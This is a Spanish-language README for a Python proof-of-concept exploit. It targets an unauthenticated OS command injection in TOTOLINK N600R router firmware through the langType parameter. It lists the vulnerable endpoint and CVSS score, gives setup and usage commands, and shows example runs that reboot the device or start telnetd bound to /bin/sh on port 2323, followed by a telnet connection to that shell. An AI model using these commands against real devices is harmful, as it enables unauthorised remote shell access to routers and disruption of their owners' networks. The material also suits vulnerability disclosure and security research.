
Prueba de concepto en Python para la inyección de comandos del sistema operativo sin autenticación en TOTOLINK N600R, que explota el parámetro langType para ejecutar comandos arbitrarios en el dispositivo.
Prueba de concepto en Python para la inyección de comandos sin autenticación en el TOTOLINK N600R.
| Producto | TOTOLINK N600R |
| Firmware | V5.3c.7159_B20190425 |
| Tipo | Inyección de comandos del sistema operativo (CWE-78) |
| Parámetro | langType |
| Endpoint | /cgi-bin/cstecgi.cgi |
| CVSS v3.1 | 9.8 Crítico |
Se descubrió que TOTOLink N600R V5.3c.7159_B20190425 contiene una vulnerabilidad de inyección de comandos a través del parámetro langtype en /setting/setLanguageCfg.
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
# Uso: python3 poc.py <OBJETIVO> <COMANDO>
# Ejemplo: python3 poc.py 192.168.68.1 "reboot"
# Ejemplo: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"
python3 poc.py <OBJETIVO> <COMANDO>
Usando el PoC para ejecutar remotamente en el objetivo la habilitación de /bin/sh en el puerto 2323
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Ver el resultado si el puerto 2323 fue habilitado

Conectar al objetivo usando telnet a través del puerto 2323
telnet 192.168.68.1 2323

Se proporciona tal cual, sin garantía. El autor no es responsable del mal uso o daños.